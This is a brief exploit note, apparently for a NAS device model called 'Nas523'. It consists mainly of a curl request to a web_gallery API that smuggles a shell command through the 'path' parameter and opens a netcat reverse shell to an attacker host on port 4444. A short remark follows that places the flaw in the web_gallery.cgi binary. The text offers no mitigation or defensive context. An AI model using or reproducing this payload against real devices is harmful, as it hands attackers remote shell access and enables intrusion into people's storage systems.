Nas523

curl -X POST "http://<TARGET_IP>/api/web_gallery" \ -d "path=/var/log;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> 4444 >/tmp/f"

The vulnerability resides within the web_gallery.cgi binary located on the device's file system. This CGI script is responsible for handling requests related to the photo gallery feature. nas523